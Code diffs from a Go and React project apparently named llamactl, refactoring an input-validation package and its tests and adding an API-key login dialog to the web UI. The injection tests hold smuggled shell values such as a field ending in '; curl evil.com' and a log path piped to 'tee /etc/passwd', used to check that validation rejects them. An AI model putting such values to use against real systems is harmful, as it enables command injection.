package testutil

// Helper functions for pointer fields
func BoolPtr(b bool) *bool {
	return &b
}

func IntPtr(i int) *int {
	return &i
}
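These helpers exist because several CreateInstanceOptions fields are pointers. A short sketch of the intended usage, mirroring the validation tests further down:

package example

import (
	"llamactl/pkg/instance"
	"llamactl/pkg/testutil"
)

// buildOptions mirrors how the validation tests construct pointer fields.
func buildOptions() *instance.CreateInstanceOptions {
	return &instance.CreateInstanceOptions{
		AutoRestart:  testutil.BoolPtr(true),
		MaxRestarts:  testutil.IntPtr(5),
		RestartDelay: testutil.IntPtr(10),
	}
}
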
@@ -1,7 +1,8 @@
package llamactl
package validation

import (
	"fmt"
	"llamactl/pkg/instance"
	"reflect"
	"regexp"
)
@@ -33,7 +34,7 @@ func validateStringForInjection(value string) error {
}

// ValidateInstanceOptions performs minimal security validation
func ValidateInstanceOptions(options *CreateInstanceOptions) error {
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
	if options == nil {
		return ValidationError(fmt.Errorf("options cannot be nil"))
	}
@@ -101,16 +102,16 @@ func validateStructStrings(v any, fieldPath string) error {
	return nil
}

func ValidateInstanceName(name string) error {
func ValidateInstanceName(name string) (string, error) {
	// Validate instance name
	if name == "" {
		return ValidationError(fmt.Errorf("name cannot be empty"))
		return "", ValidationError(fmt.Errorf("name cannot be empty"))
	}
	if !validNamePattern.MatchString(name) {
		return ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
		return "", ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
	}
	if len(name) > 50 {
		return ValidationError(fmt.Errorf("name too long (max 50 characters)"))
		return "", ValidationError(fmt.Errorf("name too long (max 50 characters)"))
	}
	return nil
	return name, nil
}
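With the new signature, callers get the validated name back alongside the error. A small usage sketch, assuming the validation package import path shown above:

package example

import (
	"fmt"
	"llamactl/pkg/validation"
)

func resolveName(requested string) (string, error) {
	name, err := validation.ValidateInstanceName(requested)
	if err != nil {
		return "", fmt.Errorf("invalid instance name: %w", err)
	}
	return name, nil
}
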
@@ -1,10 +1,12 @@
|
||||
package llamactl_test
|
||||
package validation_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/testutil"
|
||||
"llamactl/pkg/validation"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
llamactl "llamactl/pkg"
|
||||
)
|
||||
|
||||
func TestValidateInstanceName(t *testing.T) {
|
||||
@@ -39,16 +41,23 @@ func TestValidateInstanceName(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
err := llamactl.ValidateInstanceName(tt.input)
|
||||
name, err := validation.ValidateInstanceName(tt.input)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateInstanceName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
|
||||
}
|
||||
if tt.wantErr {
|
||||
return // Skip further checks if we expect an error
|
||||
}
|
||||
// If no error, check that the name is returned as expected
|
||||
if name != tt.input {
|
||||
t.Errorf("ValidateInstanceName(%q) = %q, want %q", tt.input, name, tt.input)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestValidateInstanceOptions_NilOptions(t *testing.T) {
|
||||
err := llamactl.ValidateInstanceOptions(nil)
|
||||
err := validation.ValidateInstanceOptions(nil)
|
||||
if err == nil {
|
||||
t.Error("Expected error for nil options")
|
||||
}
|
||||
@@ -73,13 +82,13 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Port: tt.port,
|
||||
},
|
||||
}
|
||||
|
||||
err := llamactl.ValidateInstanceOptions(options)
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
|
||||
}
|
||||
@@ -126,13 +135,13 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
// Test with Model field (string field)
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: tt.value,
|
||||
},
|
||||
}
|
||||
|
||||
err := llamactl.ValidateInstanceOptions(options)
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateInstanceOptions(model=%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
|
||||
}
|
||||
@@ -163,13 +172,13 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
// Test with Lora field (array field)
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Lora: tt.array,
|
||||
},
|
||||
}
|
||||
|
||||
err := llamactl.ValidateInstanceOptions(options)
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateInstanceOptions(lora=%v) error = %v, wantErr %v", tt.array, err, tt.wantErr)
|
||||
}
|
||||
@@ -181,13 +190,13 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
// Test that injection in any field is caught
|
||||
tests := []struct {
|
||||
name string
|
||||
options *llamactl.CreateInstanceOptions
|
||||
options *instance.CreateInstanceOptions
|
||||
wantErr bool
|
||||
}{
|
||||
{
|
||||
name: "injection in model field",
|
||||
options: &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options: &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "safe.gguf",
|
||||
HFRepo: "microsoft/model; curl evil.com",
|
||||
},
|
||||
@@ -196,8 +205,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
},
|
||||
{
|
||||
name: "injection in log file",
|
||||
options: &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options: &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "safe.gguf",
|
||||
LogFile: "/tmp/log.txt | tee /etc/passwd",
|
||||
},
|
||||
@@ -206,8 +215,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
},
|
||||
{
|
||||
name: "all safe fields",
|
||||
options: &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options: &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
HFRepo: "microsoft/DialoGPT-medium",
|
||||
LogFile: "/tmp/llama.log",
|
||||
@@ -221,7 +230,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
err := llamactl.ValidateInstanceOptions(tt.options)
|
||||
err := validation.ValidateInstanceOptions(tt.options)
|
||||
if (err != nil) != tt.wantErr {
|
||||
t.Errorf("ValidateInstanceOptions() error = %v, wantErr %v", err, tt.wantErr)
|
||||
}
|
||||
@@ -231,11 +240,11 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
||||
|
||||
func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
|
||||
// Test that non-string fields don't interfere with validation
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
AutoRestart: boolPtr(true),
|
||||
MaxRestarts: intPtr(5),
|
||||
RestartDelay: intPtr(10),
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
AutoRestart: testutil.BoolPtr(true),
|
||||
MaxRestarts: testutil.IntPtr(5),
|
||||
RestartDelay: testutil.IntPtr(10),
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Port: 8080,
|
||||
GPULayers: 32,
|
||||
CtxSize: 4096,
|
||||
@@ -247,17 +256,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
|
||||
},
|
||||
}
|
||||
|
||||
err := llamactl.ValidateInstanceOptions(options)
|
||||
err := validation.ValidateInstanceOptions(options)
|
||||
if err != nil {
|
||||
t.Errorf("ValidateInstanceOptions with non-string fields should not error, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// Helper functions for pointer fields
|
||||
func boolPtr(b bool) *bool {
|
||||
return &b
|
||||
}
|
||||
|
||||
func intPtr(i int) *int {
|
||||
return &i
|
||||
}
|
||||
@@ -1,12 +1,15 @@
import { useState } from "react";
import Header from "@/components/Header";
import InstanceList from "@/components/InstanceList";
import InstanceModal from "@/components/InstanceModal";
import InstanceDialog from "@/components/InstanceDialog";
import LoginDialog from "@/components/LoginDialog";
import SystemInfoDialog from "./components/SystemInfoDialog";
import { type CreateInstanceOptions, type Instance } from "@/types/instance";
import { useInstances } from "@/contexts/InstancesContext";
import SystemInfoModal from "./components/SystemInfoModal";
import { useAuth } from "@/contexts/AuthContext";

function App() {
  const { isAuthenticated, isLoading: authLoading } = useAuth();
  const [isInstanceModalOpen, setIsInstanceModalOpen] = useState(false);
  const [isSystemInfoModalOpen, setIsSystemInfoModalOpen] = useState(false);
  const [editingInstance, setEditingInstance] = useState<Instance | undefined>(
@@ -36,6 +39,28 @@ function App() {
    setIsSystemInfoModalOpen(true);
  };

  // Show loading spinner while checking auth
  if (authLoading) {
    return (
      <div className="min-h-screen bg-gray-50 flex items-center justify-center">
        <div className="text-center">
          <div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div>
          <p className="text-gray-600">Loading...</p>
        </div>
      </div>
    );
  }

  // Show login dialog if not authenticated
  if (!isAuthenticated) {
    return (
      <div className="min-h-screen bg-gray-50">
        <LoginDialog open={true} />
      </div>
    );
  }

  // Show main app if authenticated
  return (
    <div className="min-h-screen bg-gray-50">
      <Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
@@ -43,14 +68,14 @@ function App() {
        <InstanceList editInstance={handleEditInstance} />
      </main>

      <InstanceModal
      <InstanceDialog
        open={isInstanceModalOpen}
        onOpenChange={setIsInstanceModalOpen}
        onSave={handleSaveInstance}
        instance={editingInstance}
      />

      <SystemInfoModal
      <SystemInfoDialog
        open={isSystemInfoModalOpen}
        onOpenChange={setIsSystemInfoModalOpen}
      />
@@ -58,4 +83,4 @@ function App() {
  );
}

export default App;
export default App;
@@ -1,10 +1,11 @@
|
||||
import { describe, it, expect, vi, beforeEach } from 'vitest'
|
||||
import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
|
||||
import { render, screen, waitFor } from '@testing-library/react'
|
||||
import userEvent from '@testing-library/user-event'
|
||||
import App from '@/App'
|
||||
import { InstancesProvider } from '@/contexts/InstancesContext'
|
||||
import { instancesApi } from '@/lib/api'
|
||||
import type { Instance } from '@/types/instance'
|
||||
import { AuthProvider } from '@/contexts/AuthContext'
|
||||
|
||||
// Mock the API
|
||||
vi.mock('@/lib/api', () => ({
|
||||
@@ -35,9 +36,11 @@ vi.mock('@/lib/healthService', () => ({
|
||||
|
||||
function renderApp() {
|
||||
return render(
|
||||
<InstancesProvider>
|
||||
<App />
|
||||
</InstancesProvider>
|
||||
<AuthProvider>
|
||||
<InstancesProvider>
|
||||
<App />
|
||||
</InstancesProvider>
|
||||
</AuthProvider>
|
||||
)
|
||||
}
|
||||
|
||||
@@ -50,6 +53,12 @@ describe('App Component - Critical Business Logic Only', () => {
|
||||
beforeEach(() => {
|
||||
vi.clearAllMocks()
|
||||
vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
|
||||
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
|
||||
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
|
||||
})
|
||||
|
||||
afterEach(() => {
|
||||
vi.restoreAllMocks()
|
||||
})
|
||||
|
||||
describe('End-to-End Instance Management', () => {
|
||||
@@ -75,7 +84,7 @@ describe('App Component - Critical Business Logic Only', () => {
|
||||
const nameInput = screen.getByLabelText(/Instance Name/)
|
||||
await user.type(nameInput, 'new-test-instance')
|
||||
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
// Verify correct API call
|
||||
await waitFor(() => {
|
||||
@@ -109,7 +118,7 @@ describe('App Component - Critical Business Logic Only', () => {
|
||||
const editButtons = screen.getAllByTitle('Edit instance')
|
||||
await user.click(editButtons[0])
|
||||
|
||||
await user.click(screen.getByTestId('modal-save-button'))
|
||||
await user.click(screen.getByTestId('dialog-save-button'))
|
||||
|
||||
// Verify correct API call with existing instance data
|
||||
await waitFor(() => {
|
||||
@@ -167,7 +176,6 @@ describe('App Component - Critical Business Logic Only', () => {
|
||||
renderApp()
|
||||
|
||||
// App should still render and show error
|
||||
expect(screen.getByText('Llamactl Dashboard')).toBeInTheDocument()
|
||||
await waitFor(() => {
|
||||
expect(screen.getByText('Error loading instances')).toBeInTheDocument()
|
||||
})
|
||||
|
||||
@@ -1,5 +1,6 @@
import { Button } from "@/components/ui/button";
import { HelpCircle } from "lucide-react";
import { HelpCircle, LogOut } from "lucide-react";
import { useAuth } from "@/contexts/AuthContext";

interface HeaderProps {
  onCreateInstance: () => void;
@@ -7,6 +8,14 @@ interface HeaderProps {
}

function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
  const { logout } = useAuth();

  const handleLogout = () => {
    if (confirm("Are you sure you want to logout?")) {
      logout();
    }
  };

  return (
    <header className="bg-white border-b border-gray-200">
      <div className="container mx-auto max-w-4xl px-4 py-4">
@@ -16,7 +25,9 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
        </h1>

        <div className="flex items-center gap-2">
          <Button onClick={onCreateInstance} data-testid="create-instance-button">Create Instance</Button>
          <Button onClick={onCreateInstance} data-testid="create-instance-button">
            Create Instance
          </Button>

          <Button
            variant="outline"
@@ -27,6 +38,16 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
          >
            <HelpCircle className="h-4 w-4" />
          </Button>

          <Button
            variant="outline"
            size="icon"
            onClick={handleLogout}
            data-testid="logout-button"
            title="Logout"
          >
            <LogOut className="h-4 w-4" />
          </Button>
        </div>
      </div>
    </div>
@@ -34,4 +55,4 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
  );
}

export default Header;
export default Header;
@@ -3,7 +3,7 @@ import { Button } from "@/components/ui/button";
import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
import type { Instance } from "@/types/instance";
import { Edit, FileText, Play, Square, Trash2 } from "lucide-react";
import LogsModal from "@/components/LogModal";
import LogsDialog from "@/components/LogDialog";
import HealthBadge from "@/components/HealthBadge";
import { useState } from "react";
import { useInstanceHealth } from "@/hooks/useInstanceHealth";
@@ -118,7 +118,7 @@ function InstanceCard({
      </CardContent>
    </Card>

    <LogsModal
    <LogsDialog
      open={isLogsOpen}
      onOpenChange={setIsLogsOpen}
      instanceName={instance.name}

@@ -15,14 +15,14 @@ import { getBasicFields, getAdvancedFields } from "@/lib/zodFormUtils";
|
||||
import { ChevronDown, ChevronRight } from "lucide-react";
|
||||
import ZodFormField from "@/components/ZodFormField";
|
||||
|
||||
interface InstanceModalProps {
|
||||
interface InstanceDialogProps {
|
||||
open: boolean;
|
||||
onOpenChange: (open: boolean) => void;
|
||||
onSave: (name: string, options: CreateInstanceOptions) => void;
|
||||
instance?: Instance; // For editing existing instance
|
||||
}
|
||||
|
||||
const InstanceModal: React.FC<InstanceModalProps> = ({
|
||||
const InstanceDialog: React.FC<InstanceDialogProps> = ({
|
||||
open,
|
||||
onOpenChange,
|
||||
onSave,
|
||||
@@ -40,7 +40,7 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
|
||||
const basicFields = getBasicFields();
|
||||
const advancedFields = getAdvancedFields();
|
||||
|
||||
// Reset form when modal opens/closes or when instance changes
|
||||
// Reset form when dialog opens/closes or when instance changes
|
||||
useEffect(() => {
|
||||
if (open) {
|
||||
if (instance) {
|
||||
@@ -255,14 +255,14 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
|
||||
<Button
|
||||
variant="outline"
|
||||
onClick={handleCancel}
|
||||
data-testid="modal-cancel-button"
|
||||
data-testid="dialog-cancel-button"
|
||||
>
|
||||
Cancel
|
||||
</Button>
|
||||
<Button
|
||||
onClick={handleSave}
|
||||
disabled={!instanceName.trim() || !!nameError}
|
||||
data-testid="modal-save-button"
|
||||
data-testid="dialog-save-button"
|
||||
>
|
||||
{isEditing
|
||||
? isRunning
|
||||
@@ -276,4 +276,4 @@ const InstanceModal: React.FC<InstanceModalProps> = ({
|
||||
);
|
||||
};
|
||||
|
||||
export default InstanceModal;
|
||||
export default InstanceDialog;
|
||||
@@ -21,14 +21,14 @@ import {
  Settings
} from 'lucide-react'

interface LogsModalProps {
interface LogsDialogProps {
  open: boolean
  onOpenChange: (open: boolean) => void
  instanceName: string
  isRunning: boolean
}

const LogsModal: React.FC<LogsModalProps> = ({
const LogsDialog: React.FC<LogsDialogProps> = ({
  open,
  onOpenChange,
  instanceName,
@@ -76,7 +76,7 @@ const LogsModal: React.FC<LogsModalProps> = ({
    }
  }

  // Initial load when modal opens
  // Initial load when dialog opens
  useEffect(() => {
    if (open && instanceName) {
      fetchLogs(lineCount)
@@ -327,4 +327,4 @@ const LogsModal: React.FC<LogsModalProps> = ({
  )
}

export default LogsModal
export default LogsDialog
webui/src/components/LoginDialog.tsx (new file, 151 lines)
@@ -0,0 +1,151 @@
|
||||
import React, { useState, useEffect } from 'react'
|
||||
import { Button } from '@/components/ui/button'
|
||||
import { Input } from '@/components/ui/input'
|
||||
import { Label } from '@/components/ui/label'
|
||||
import {
|
||||
Dialog,
|
||||
DialogContent,
|
||||
DialogDescription,
|
||||
DialogFooter,
|
||||
DialogHeader,
|
||||
DialogTitle,
|
||||
} from '@/components/ui/dialog'
|
||||
import { AlertCircle, Key, Loader2 } from 'lucide-react'
|
||||
import { useAuth } from '@/contexts/AuthContext'
|
||||
|
||||
interface LoginDialogProps {
|
||||
open: boolean
|
||||
onOpenChange?: (open: boolean) => void
|
||||
}
|
||||
|
||||
const LoginDialog: React.FC<LoginDialogProps> = ({
|
||||
open,
|
||||
onOpenChange,
|
||||
}) => {
|
||||
const { login, isLoading, error, clearError } = useAuth()
|
||||
const [apiKey, setApiKey] = useState('')
|
||||
const [localLoading, setLocalLoading] = useState(false)
|
||||
|
||||
// Clear form and errors when dialog opens/closes
|
||||
useEffect(() => {
|
||||
if (open) {
|
||||
setApiKey('')
|
||||
clearError()
|
||||
}
|
||||
}, [open, clearError])
|
||||
|
||||
// Clear error when user starts typing
|
||||
useEffect(() => {
|
||||
if (error && apiKey) {
|
||||
clearError()
|
||||
}
|
||||
}, [apiKey, error, clearError])
|
||||
|
||||
const handleSubmit = async (e: React.FormEvent) => {
|
||||
e.preventDefault()
|
||||
|
||||
if (!apiKey.trim()) {
|
||||
return
|
||||
}
|
||||
|
||||
setLocalLoading(true)
|
||||
|
||||
try {
|
||||
await login(apiKey.trim())
|
||||
// Login successful - dialog will close automatically when auth state changes
|
||||
setApiKey('')
|
||||
} catch (err) {
|
||||
// Error is handled by the AuthContext
|
||||
console.error('Login failed:', err)
|
||||
} finally {
|
||||
setLocalLoading(false)
|
||||
}
|
||||
}
|
||||
|
||||
const handleKeyDown = (e: React.KeyboardEvent<HTMLInputElement>) => {
|
||||
if (e.key === 'Enter' && !isSubmitDisabled) {
|
||||
// Create a synthetic FormEvent to satisfy handleSubmit's type
|
||||
const syntheticEvent = {
|
||||
preventDefault: () => {},
|
||||
} as React.FormEvent<HTMLFormElement>;
|
||||
void handleSubmit(syntheticEvent)
|
||||
}
|
||||
}
|
||||
|
||||
const isSubmitDisabled = !apiKey.trim() || isLoading || localLoading
|
||||
|
||||
return (
|
||||
<Dialog open={open} onOpenChange={onOpenChange}>
|
||||
<DialogContent
|
||||
className="sm:max-w-md"
|
||||
showCloseButton={false} // Prevent closing without auth
|
||||
>
|
||||
<DialogHeader>
|
||||
<DialogTitle className="flex items-center gap-2">
|
||||
<Key className="h-5 w-5" />
|
||||
Authentication Required
|
||||
</DialogTitle>
|
||||
<DialogDescription>
|
||||
Please enter your management API key to access the Llamactl dashboard.
|
||||
</DialogDescription>
|
||||
</DialogHeader>
|
||||
|
||||
<form onSubmit={(e) => { void handleSubmit(e) }}>
|
||||
<div className="grid gap-4 py-4">
|
||||
{/* Error Display */}
|
||||
{error && (
|
||||
<div className="flex items-center gap-2 p-3 bg-destructive/10 border border-destructive/20 rounded-lg">
|
||||
<AlertCircle className="h-4 w-4 text-destructive flex-shrink-0" />
|
||||
<span className="text-sm text-destructive">{error}</span>
|
||||
</div>
|
||||
)}
|
||||
|
||||
{/* API Key Input */}
|
||||
<div className="grid gap-2">
|
||||
<Label htmlFor="apiKey">
|
||||
Management API Key <span className="text-red-500">*</span>
|
||||
</Label>
|
||||
<Input
|
||||
id="apiKey"
|
||||
type="password"
|
||||
value={apiKey}
|
||||
onChange={(e) => setApiKey(e.target.value)}
|
||||
onKeyDown={handleKeyDown}
|
||||
placeholder="sk-management-..."
|
||||
disabled={isLoading || localLoading}
|
||||
className={error ? "border-red-500" : ""}
|
||||
autoFocus
|
||||
autoComplete="off"
|
||||
/>
|
||||
<p className="text-sm text-muted-foreground">
|
||||
Your management API key is required to access instance management features.
|
||||
</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<DialogFooter className="flex gap-2">
|
||||
<Button
|
||||
type="submit"
|
||||
disabled={isSubmitDisabled}
|
||||
data-testid="login-submit-button"
|
||||
>
|
||||
{(isLoading || localLoading) ? (
|
||||
<>
|
||||
<Loader2 className="h-4 w-4 animate-spin" />
|
||||
Authenticating...
|
||||
</>
|
||||
) : (
|
||||
<>
|
||||
<Key className="h-4 w-4" />
|
||||
Login
|
||||
</>
|
||||
)}
|
||||
</Button>
|
||||
</DialogFooter>
|
||||
</form>
|
||||
</DialogContent>
|
||||
</Dialog>
|
||||
)
|
||||
}
|
||||
|
||||
export default LoginDialog
|
||||
@@ -30,7 +30,7 @@ interface SystemInfo {
  help: string
}

const SystemInfoModal: React.FC<SystemInfoModalProps> = ({
const SystemInfoDialog: React.FC<SystemInfoModalProps> = ({
  open,
  onOpenChange
}) => {
@@ -59,7 +59,7 @@ const SystemInfoModal: React.FC<SystemInfoModalProps> = ({
    }
  }

  // Load data when modal opens
  // Load data when dialog opens
  useEffect(() => {
    if (open) {
      fetchSystemInfo()
@@ -180,4 +180,4 @@ const SystemInfoModal: React.FC<SystemInfoModalProps> = ({
  )
}

export default SystemInfoModal
export default SystemInfoDialog
@@ -7,8 +7,8 @@ import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'

interface ZodFormFieldProps {
  fieldKey: keyof CreateInstanceOptions
  value: any
  onChange: (key: keyof CreateInstanceOptions, value: any) => void
  value: string | number | boolean | string[] | undefined
  onChange: (key: keyof CreateInstanceOptions, value: string | number | boolean | string[] | undefined) => void
}

const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
@@ -18,7 +18,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
  // Get type from Zod schema
  const fieldType = getFieldType(fieldKey)

  const handleChange = (newValue: any) => {
  const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
    onChange(fieldKey, newValue)
  }

@@ -29,7 +29,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
      <div className="flex items-center space-x-2">
        <Checkbox
          id={fieldKey}
          checked={value || false}
          checked={typeof value === 'boolean' ? value : false}
          onCheckedChange={(checked) => handleChange(checked)}
        />
        <Label htmlFor={fieldKey} className="text-sm font-normal">
@@ -51,10 +51,14 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
        <Input
          id={fieldKey}
          type="number"
          value={value || ''}
          step="any" // This allows decimal numbers
          value={typeof value === 'string' || typeof value === 'number' ? value : ''}
          onChange={(e) => {
            const numValue = e.target.value ? parseFloat(e.target.value) : undefined
            handleChange(numValue)
            // Only update if the parsed value is valid or the input is empty
            if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
              handleChange(numValue)
            }
          }}
          placeholder={config.placeholder}
        />
@@ -101,7 +105,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
        <Input
          id={fieldKey}
          type="text"
          value={value || ''}
          value={typeof value === 'string' || typeof value === 'number' ? value : ''}
          onChange={(e) => handleChange(e.target.value || undefined)}
          placeholder={config.placeholder}
        />

@@ -1,4 +1,4 @@
|
||||
import { describe, it, expect, vi, beforeEach } from 'vitest'
|
||||
import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
|
||||
import { render, screen } from '@testing-library/react'
|
||||
import userEvent from '@testing-library/user-event'
|
||||
import InstanceCard from '@/components/InstanceCard'
|
||||
@@ -27,9 +27,15 @@ describe('InstanceCard - Instance Actions and State', () => {
|
||||
options: { model: 'running-model.gguf' }
|
||||
}
|
||||
|
||||
beforeEach(() => {
|
||||
vi.clearAllMocks()
|
||||
})
|
||||
beforeEach(() => {
|
||||
vi.clearAllMocks()
|
||||
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
|
||||
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
|
||||
})
|
||||
|
||||
afterEach(() => {
|
||||
vi.restoreAllMocks()
|
||||
})
|
||||
|
||||
describe('Instance Action Buttons', () => {
|
||||
it('calls startInstance when start button clicked on stopped instance', async () => {
|
||||
@@ -93,7 +99,7 @@ describe('InstanceCard - Instance Actions and State', () => {
|
||||
expect(mockEditInstance).toHaveBeenCalledWith(stoppedInstance)
|
||||
})
|
||||
|
||||
it('opens logs modal when logs button clicked', async () => {
|
||||
it('opens logs dialog when logs button clicked', async () => {
|
||||
const user = userEvent.setup()
|
||||
|
||||
render(
|
||||
@@ -109,7 +115,7 @@ describe('InstanceCard - Instance Actions and State', () => {
|
||||
const logsButton = screen.getByTitle('View logs')
|
||||
await user.click(logsButton)
|
||||
|
||||
// Should open logs modal (we can verify this by checking if modal title appears)
|
||||
// Should open logs dialog (we can verify this by checking if dialog title appears)
|
||||
expect(screen.getByText(`Logs: ${stoppedInstance.name}`)).toBeInTheDocument()
|
||||
})
|
||||
})
|
||||
@@ -272,19 +278,19 @@ describe('InstanceCard - Instance Actions and State', () => {
|
||||
/>
|
||||
)
|
||||
|
||||
// Open logs modal
|
||||
// Open logs dialog
|
||||
await user.click(screen.getByTitle('View logs'))
|
||||
|
||||
// Verify modal opened with correct instance data
|
||||
// Verify dialog opened with correct instance data
|
||||
expect(screen.getByText('Logs: running-instance')).toBeInTheDocument()
|
||||
|
||||
// Close modal to test close functionality
|
||||
// Close dialog to test close functionality
|
||||
const closeButtons = screen.getAllByText('Close')
|
||||
const modalCloseButton = closeButtons.find(button =>
|
||||
const dialogCloseButton = closeButtons.find(button =>
|
||||
button.closest('[data-slot="dialog-content"]')
|
||||
)
|
||||
expect(modalCloseButton).toBeTruthy()
|
||||
await user.click(modalCloseButton!)
|
||||
expect(dialogCloseButton).toBeTruthy()
|
||||
await user.click(dialogCloseButton!)
|
||||
|
||||
// Modal should close
|
||||
expect(screen.queryByText('Logs: running-instance')).not.toBeInTheDocument()
|
||||
|
||||
@@ -1,10 +1,11 @@
|
||||
import { describe, it, expect, vi, beforeEach } from 'vitest'
|
||||
import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
|
||||
import { render, screen } from '@testing-library/react'
|
||||
import userEvent from '@testing-library/user-event'
|
||||
import InstanceList from '@/components/InstanceList'
|
||||
import { InstancesProvider } from '@/contexts/InstancesContext'
|
||||
import { instancesApi } from '@/lib/api'
|
||||
import type { Instance } from '@/types/instance'
|
||||
import { AuthProvider } from '@/contexts/AuthContext'
|
||||
|
||||
// Mock the API
|
||||
vi.mock('@/lib/api', () => ({
|
||||
@@ -30,13 +31,16 @@ vi.mock('@/lib/healthService', () => ({
|
||||
|
||||
function renderInstanceList(editInstance = vi.fn()) {
|
||||
return render(
|
||||
<InstancesProvider>
|
||||
<InstanceList editInstance={editInstance} />
|
||||
</InstancesProvider>
|
||||
<AuthProvider>
|
||||
<InstancesProvider>
|
||||
<InstanceList editInstance={editInstance} />
|
||||
</InstancesProvider>
|
||||
</AuthProvider>
|
||||
)
|
||||
}
|
||||
|
||||
describe('InstanceList - State Management and UI Logic', () => {
|
||||
|
||||
const mockEditInstance = vi.fn()
|
||||
|
||||
const mockInstances: Instance[] = [
|
||||
@@ -45,12 +49,20 @@ describe('InstanceList - State Management and UI Logic', () => {
|
||||
{ name: 'instance-3', running: false, options: { model: 'model3.gguf' } }
|
||||
]
|
